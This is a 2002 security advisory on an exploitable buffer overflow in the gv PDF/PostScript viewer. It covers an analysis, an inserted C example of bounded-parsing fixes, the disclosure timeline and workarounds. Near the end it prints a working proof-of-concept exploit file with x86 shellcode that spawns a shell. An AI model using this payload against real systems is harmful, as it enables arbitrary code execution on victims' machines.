[UNIX] Exploitable Buffer Overflow in gv
From: support@securiteam.com
Date: 09/30/02
From: support@securiteam.com To: list@securiteam.com Date: Mon, 30 Sep 2002 10:53:20 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Exploitable Buffer Overflow in gv
------------------------------------------------------------------------
SUMMARY
The gv program that is shipped on many UNIX systems contains a buffer
overflow that can be exploited by an attacker sending a malformed
PostScript or Adobe PDF file. The attacker would be able to cause
arbitrary code to run with the privileges of the victim on the victim's
Linux computer. The gv program is a PDF and PostScript viewing program for
UNIX that interfaces with the ghostscript interpreter. It is maintained at
http://wwwthep.physik.uni-mainz.de/~plass/gv/ by Johannes Plass. This
particular security vulnerability occurs in the source code where an
unsafe sscanf() call is used to interpret PostScript and PDF files.
DETAILS
Analysis:
In order to perform exploitation, an attacker would have to trick a user
into viewing a malformed PDF or PostScript file from the command line.
This may be somewhat easier with UNIX-based email programs that associate
gv with email attachments. Since gv is not normally installed setuid root,
an attacker would only be able to cause arbitrary code to run with the
privileges of that user. Other programs that utilize derivatives of gv,
such as ggv or kghostview, may also be vulnerable in similar ways.
A proof of concept exploit for Red Hat Linux designed by zen-parse is
attached to this message. It packages the overflow and shellcode in the
"%%PageOrder:" section of the PDF.
[root@victim]# ls -al /tmp/itworked
/bin/ls: /tmp/itworked: No such file or directory
[root@victim]# gv gv-exploit.pdf
[root@victim]# ls -al /tmp/itworked
-rw-r--r-- 1 root root 0 Aug 22 16:50 /tmp/itworked
[root@victim]#
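The advisory attributes the overflow to an unbounded sscanf() into a fixed-size line buffer while gv reads DSC comments such as %%PageOrder:. The following C example is added here and is not gv's code: it shows that pattern as a comment, then two bounded ways to read the same field (a scanf width specifier and an explicit length check), and exercises both on a constructed overlong %%PageOrder: line. The buffer size PSLINELENGTH, the field width, the status codes and the function names are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>

/* Line buffer size, assumed for this example (gv's own constant is not
 * reproduced). The scanf field width must be one less than the buffer,
 * leaving room for the terminating NUL. */
#define PSLINELENGTH 257
#define PSFIELDWIDTH 256
#define STR_(n) #n
#define STR(n) STR_(n)

/* The unsafe pattern the advisory describes, kept as a comment only:
 *
 *     char text[PSLINELENGTH];
 *     sscanf(line, "%%%%PageOrder: %s", text);
 *
 * "%s" carries no width, so a %%PageOrder: value longer than the buffer
 * is copied past its end. */

typedef enum { DSC_OK = 0, DSC_NO_MATCH = 1, DSC_TOO_LONG = 2 } dsc_status;

/* Minimal fix: give %s a width one less than the buffer size. An overlong
 * value is silently truncated instead of overflowing. In a scanf format
 * "%%" matches one literal '%', hence four of them for "%%PageOrder:". */
dsc_status parse_page_order_scanf(const char *line, char *text)
{
    text[0] = '\0';
    if (sscanf(line, "%%%%PageOrder: %" STR(PSFIELDWIDTH) "s", text) != 1)
        return DSC_NO_MATCH;
    return DSC_OK;
}

/* Explicit fix: copy the first token after the keyword under a checked
 * bound and report a value that does not fit rather than hide it. */
dsc_status parse_page_order(const char *line, char *out, size_t outsz)
{
    static const char key[] = "%%PageOrder:";
    const size_t keylen = sizeof key - 1;
    const char *p;
    size_t n;

    if (strncmp(line, key, keylen) != 0)
        return DSC_NO_MATCH;
    p = line + keylen;
    while (*p == ' ' || *p == '\t')
        p++;
    n = strcspn(p, " \t\r\n");        /* length of the value token */
    if (n == 0)
        return DSC_NO_MATCH;
    if (n >= outsz)
        return DSC_TOO_LONG;          /* value plus NUL would not fit */
    memcpy(out, p, n);
    out[n] = '\0';
    return DSC_OK;
}

/* Constructed input: a %%PageOrder: line whose value is far longer than
 * PSLINELENGTH. It has the shape of the advisory's input but contains
 * only 'A' characters. */
#define LONG_VALUE_LEN 1000
static char overlong_line[sizeof "%%PageOrder: " + LONG_VALUE_LEN + 1];

static const char *build_overlong_line(void)
{
    const char key[] = "%%PageOrder: ";
    size_t klen = sizeof key - 1;
    memcpy(overlong_line, key, klen);
    memset(overlong_line + klen, 'A', LONG_VALUE_LEN);
    overlong_line[klen + LONG_VALUE_LEN] = '\n';
    overlong_line[klen + LONG_VALUE_LEN + 1] = '\0';
    return overlong_line;
}

/* Characters the sscanf fix keeps from the overlong value (PSFIELDWIDTH). */
size_t scanf_fix_kept_chars(void)
{
    char text[PSLINELENGTH];
    parse_page_order_scanf(build_overlong_line(), text);
    return strlen(text);
}

/* Status the explicit parser reports for the overlong value. */
dsc_status explicit_fix_status(void)
{
    char text[PSLINELENGTH];
    return parse_page_order(build_overlong_line(), text, sizeof text);
}

/* Returns 1 when both parsers read an ordinary value as "Ascend". */
int parses_ordinary_value(void)
{
    char a[PSLINELENGTH], b[PSLINELENGTH];
    const char *line = "%%PageOrder: Ascend\n";
    if (parse_page_order(line, a, sizeof a) != DSC_OK) return 0;
    if (parse_page_order_scanf(line, b) != DSC_OK) return 0;
    return strcmp(a, "Ascend") == 0 && strcmp(b, "Ascend") == 0;
}

int main(void)
{
    printf("ordinary value parsed by both: %d\n", parses_ordinary_value());
    printf("sscanf fix kept %zu of %d chars\n", scanf_fix_kept_chars(), LONG_VALUE_LEN);
    printf("explicit fix status: %d (2 = too long)\n", explicit_fix_status());
    return 0;
}
```

The width specifier is the one-line change that closes the overflow, but it truncates silently; the explicit parser is preferable when the caller should learn that the file is malformed and can refuse it.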
Detection:
This vulnerability affects the latest version of gv, 3.5.8. An exploit has
been tested on Red Hat Linux 7.3.
Workaround:
To avoid potential exploitation, users can select alternatives to gv, such
as Kghostview (included with the KDE desktop environment).
Additionally, the vulnerability does not seem to be exploitable when a
file is opened from the gv interface instead of the command line.
Vendor response:
The author could not be contacted, and the main home page has not been
updated since 1997. Coordinated public disclosure was scheduled for
September 26, 2002 with UNIX vendors.
Disclosure timeline:
8/23/2002 Disclosed to iDEFENSE
9/6/2002 Disclosed to vendor (plass@thep.physik.uni-mainz.de) by iDEFENSE
9/6/2002 Disclosed to iDEFENSE clients
9/12/2002 Disclosed to UNIX vendors
9/13/2002 Second vendor disclosure attempt
9/26/2002 Public Disclosure
Exploit code:
The following PDF file, once opened by the program, will cause the
creation of /tmp/itworked:
%!PS-Adobe-3.0
%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)
%%CreationDate: Sat Jun 15 15:30ish
%%PageOrder:
AAAAAAAAABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDAB
CDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABC
DABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCDABCD
ABCDABCDABCDaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssss
ttttuuuuvvvvwwww òÿ¿@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@¼üÿÿ¿1
Àh//shh/bin‰ãPh//shh/bin‰áPh-ppc‰æPhrkedhitwohtmp/hFS}/hh${Ihtouc‰âPRVQTYPTZ°!HHHHH
HHHHHHHHHHHHHHHHHÍ€
%%EndComments
%%EOF
(NOTE: The lines have been wrapped; the above PDF is actually 7 lines. The
long line starts with %%PageOrder: and ends with
HHHHHHHHHHHHHHHHHHHHHHÍ€.)
ADDITIONAL INFORMATION
The information has been provided to iDEFENSE by zen-parse
<zen-parse@gmx.net>.